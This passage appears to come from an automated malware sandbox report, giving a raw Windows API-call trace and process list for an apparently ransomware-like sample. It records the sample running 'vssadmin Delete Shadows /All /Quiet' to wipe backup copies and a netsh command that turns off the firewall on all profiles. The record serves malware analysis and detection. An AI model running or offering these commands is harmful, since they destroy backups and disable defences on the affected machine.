[0113.004] UpdateProcThreadAttribute (in: lpAttributeList=0x2eed38, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eece8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eed38, lpPreviousValue=0x0) returned 1 [0113.004] GetStartupInfoW (in: lpStartupInfo=0x2eee50 | out: lpStartupInfo=0x2eee50*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0113.004] GetProcessHeap () returned 0x4c0000 [0113.004] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x20) returned 0x4d4630 [0113.004] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0113.004] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0113.004] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0113.005] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0113.006] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0113.006] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0113.006] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0113.006] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0113.006] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0113.006] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0113.006] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0113.006] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0113.006] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0113.006] GetProcessHeap () returned 0x4c0000 [0113.006] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d4630 | out: hHeap=0x4c0000) returned 1 [0113.006] GetProcessHeap () returned 0x4c0000 [0113.006] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x12) returned 0x4d9e60 [0113.006] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0113.008] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x2eed70*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin Delete Shadows /All /Quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eed20 | out: lpCommandLine="vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x2eed20*(hProcess=0x54, hThread=0x50, dwProcessId=0xb20, dwThreadId=0x270)) returned 1 [0113.017] CloseHandle (hObject=0x50) returned 1 [0113.018] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0113.018] GetProcessHeap () returned 0x4c0000 [0113.018] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d8ab0 | out: hHeap=0x4c0000) returned 1 [0113.018] GetEnvironmentStringsW () returned 0x4d8ab0* [0113.018] GetProcessHeap () returned 0x4c0000 [0113.018] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xab2) returned 0x4dafc0 [0113.018] FreeEnvironmentStringsW (penv=0x4d8ab0) returned 1 [0113.018] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0189.334] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2eec68 | out: lpExitCode=0x2eec68*=0x0) returned 1 [0189.334] CloseHandle (hObject=0x54) returned 1 [0189.334] _vsnwprintf (in: _Buffer=0x2eeed8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eec78 | out: _Buffer="00000000") returned 8 [0189.335] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.335] GetProcessHeap () returned 0x4c0000 [0189.335] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4dafc0 | out: hHeap=0x4c0000) returned 1 [0189.335] GetEnvironmentStringsW () returned 0x4c1320* [0189.335] GetProcessHeap () returned 0x4c0000 [0189.335] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xad8) returned 0x4dc560 [0189.335] FreeEnvironmentStringsW (penv=0x4c1320) returned 1 [0189.335] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.335] GetProcessHeap () returned 0x4c0000 [0189.335] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4dc560 | out: hHeap=0x4c0000) returned 1 [0189.335] GetEnvironmentStringsW () returned 0x4c1320* [0189.335] GetProcessHeap () returned 0x4c0000 [0189.335] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xad8) returned 0x4dc560 [0189.335] FreeEnvironmentStringsW (penv=0x4c1320) returned 1 [0189.335] GetProcessHeap () returned 0x4c0000 [0189.335] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d9e60 | out: hHeap=0x4c0000) returned 1 [0189.335] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eed38 | out: lpAttributeList=0x2eed38) [0189.335] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.336] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.336] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4abbe194 | out: lpMode=0x4abbe194) returned 1 [0189.336] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.336] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4abbe198 | out: lpMode=0x4abbe198) returned 1 [0189.336] SetConsoleInputExeNameW () returned 0x1 [0189.336] GetConsoleOutputCP () returned 0x1b5 [0189.336] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abcbfe0 | out: lpCPInfo=0x4abcbfe0) returned 1 [0189.336] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0189.337] exit (_Code=0) Process: id = "7" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x5f2eb000" os_pid = "0xb20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xbb4" cmd_line = "vssadmin Delete Shadows /All /Quiet" cur_dir = "C:\\Windows\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 79 os_tid = 0x270 Thread: id = 80 os_tid = 0xb50 Thread: id = 81 os_tid = 0xb48 Thread: id = 82 os_tid = 0xb60 Thread: id = 83 os_tid = 0xbac Process: id = "8" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x6092f000" os_pid = "0x6c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xb40" cmd_line = "vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 84 os_tid = 0x314 Thread: id = 106 os_tid = 0x330 Thread: id = 114 os_tid = 0x9d8 Thread: id = 116 os_tid = 0xbc0 Thread: id = 117 os_tid = 0xa78 Process: id = "9" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x5e440000" os_pid = "0x310" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00060a1e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 85 os_tid = 0x6c0 Thread: id = 86 os_tid = 0x7dc Thread: id = 87 os_tid = 0x748 Thread: id = 88 os_tid = 0xa38 [0114.618] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xfad7a0 | out: lpSystemTimeAsFileTime=0xfad7a0*(dwLowDateTime=0xf32fb8e0, dwHighDateTime=0x1d6a20a)) [0114.618] GetCurrentProcessId () returned 0x310 [0114.618] GetCurrentThreadId () returned 0xa38 [0114.618] GetTickCount () returned 0x1152118 [0114.618] QueryPerformanceCounter (in: lpPerformanceCount=0xfad7a8 | out: lpPerformanceCount=0xfad7a8*=23467206013) returned 1 [0114.619] malloc (_Size=0x100) returned 0x468e80 Thread: id = 89 os_tid = 0xa3c Thread: id = 90 os_tid = 0xa8c Thread: id = 91 os_tid = 0x34c Thread: id = 107 os_tid = 0x968 Thread: id = 124 os_tid = 0xb0 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 92 os_tid = 0x8f8 Thread: id = 93 os_tid = 0xa7c Thread: id = 94 os_tid = 0x768 Thread: id = 95 os_tid = 0x764 Thread: id = 96 os_tid = 0x758 Thread: id = 97 os_tid = 0x724 Thread: id = 98 os_tid = 0x718 Thread: id = 99 os_tid = 0x714 Thread: id = 100 os_tid = 0x154 Thread: id = 101 os_tid = 0x120 Thread: id = 102 os_tid = 0x118 Thread: id = 103 os_tid = 0xf0 Thread: id = 104 os_tid = 0x6b0 Thread: id = 105 os_tid = 0x500 Thread: id = 200 os_tid = 0x570 Process: id = "11" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x5b99000" os_pid = "0xb44" os_integrity_level = "0x3000" os_privileges = "0x60900000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 108 os_tid = 0x180 Thread: id = 109 os_tid = 0x6d8 Thread: id = 110 os_tid = 0x53c Thread: id = 111 os_tid = 0x72c Thread: id = 112 os_tid = 0xa40 Thread: id = 113 os_tid = 0xba8 Thread: id = 115 os_tid = 0x544 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5d54a000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:000610a0" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 118 os_tid = 0x36c Thread: id = 119 os_tid = 0x8e8 Thread: id = 120 os_tid = 0x7b4 Thread: id = 121 os_tid = 0x2dc Thread: id = 122 os_tid = 0x30c Thread: id = 123 os_tid = 0x410 Thread: id = 201 os_tid = 0x72c Process: id = "13" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x2d72e000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xba0" cmd_line = "\"netsh.exe\" Advfirewall set allprofiles state off" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 125 os_tid = 0xa5c [0120.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fd10 | out: lpSystemTimeAsFileTime=0x12fd10*(dwLowDateTime=0xf64d2580, dwHighDateTime=0x1d6a20a)) [0120.404] GetCurrentProcessId () returned 0xa70 [0120.404] GetCurrentThreadId () returned 0xa5c [0120.404] GetTickCount () returned 0x1153582 [0120.404] QueryPerformanceCounter (in: lpPerformanceCount=0x12fd18 | out: lpPerformanceCount=0x12fd18*=24045790285) returned 1 [0120.405] GetModuleHandleW (lpModuleName=0x0) returned 0xd00000 [0120.405] __set_app_type (_Type=0x1) [0120.405] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd0ad14) returned 0x0 [0120.405] __wgetmainargs (in: _Argc=0xd155c0, _Argv=0xd155d0, _Env=0xd155c8, _DoWildCard=0, _StartInfo=0xd155dc | out: _Argc=0xd155c0, _Argv=0xd155d0, _Env=0xd155c8) returned 0 [0120.407] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.407] GetModuleHandleW (lpModuleName=0x0) returned 0xd00000 [0120.407] _vsnwprintf (in: _Buffer=0xd17a40, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x127868 | out: _Buffer="netsh>") returned 6 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f07a0 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f07c0 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f07e0 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0800 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0820 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0840 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0890 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f08b0 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f08d0 [0120.407] GetProcessHeap () returned 0x2d0000 [0120.407] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f08f0 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0910 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0930 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0950 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0970 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0990 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f09b0 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f09d0 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f09f0 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0a10 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0a30 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0a50 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0a70 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0a90 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0ab0 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0ad0 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0af0 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0b10 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.408] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0b30 [0120.408] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0b50 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0b70 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0b90 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0bb0 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0bd0 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0bf0 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0c10 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0c30 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0c50 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0c70 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0c90 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0cb0 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0cd0 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0cf0 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0d10 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0d30 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0d50 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0d70 [0120.409] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0d90 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0db0 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0dd0 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0df0 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0e10 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0e30 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0e50 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0e70 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0e90 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0eb0 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0ed0 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0ef0 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 